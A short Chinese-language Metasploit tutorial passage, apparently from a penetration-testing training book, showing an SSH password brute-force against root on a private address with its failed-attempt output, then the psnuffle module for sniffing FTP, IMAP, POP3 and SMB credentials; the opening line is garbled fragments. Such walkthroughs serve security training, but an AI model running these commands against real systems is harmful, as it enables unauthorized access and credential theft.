new ted sts sni exec 允許 timeout .... ace

密碼暴力破解以SSH為例，其他協議方法類似 SSH msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > set rhosts 192.168.3.199 rhosts => 192.168.3.199 msf auxiliary(ssh_login) > set username root username => root msf auxiliary(ssh_login) > set pass_file /root/pass.txt pass_file => /root/pass.txt msf auxiliary(ssh_login) > set threads 100 threads => 100 msf auxiliary(ssh_login) > run [*] SSH - Starting bruteforce [-] SSH - Failed: ‘root:19500101an‘ [-] SSH - Failed: ‘root:19500101ba‘ [-] SSH - Failed: ‘root:19500101bai‘ [-] SSH - Failed: ‘root:19500101ban‘ [-] SSH - Failed: ‘root:19500101bao‘ [-] SSH - Failed: ‘root:19500101bei‘ [-] SSH - Failed: ‘root:19500101bi‘ [-] SSH - Failed: ‘root:19500101bian‘

---

在計入對方網絡的初始訪問點後才能夠方便的使用psnuffle模塊進行口令嗅探。條件允許的話再介入網絡的整個過程都要保持嗅探器的運行。增加截獲口令的可能性。 msf > use auxiliary/sniffer/psnuffle msf auxiliary(psnuffle) > show options Module options (auxiliary/sniffer/psnuffle): Name Current Setting Required Description ---- --------------- -------- ----------- FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process PROTOCOLS all yes A comma-delimited list of protocols to sniff or "all". SNAPLEN 65535 yes The number of bytes to capture TIMEOUT 500 yes The number of seconds to wait for new data Auxiliary action: Name Description ---- ----------- Sniffer msf auxiliary(psnuffle) > run [*] Auxiliary module execution completed msf auxiliary(psnuffle) > [*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb... [*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb... [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb... [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb... [*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb... [*] Sniffing traffic.....

MSF魔鬼訓練營-3.3.2 口令猜測與嗅探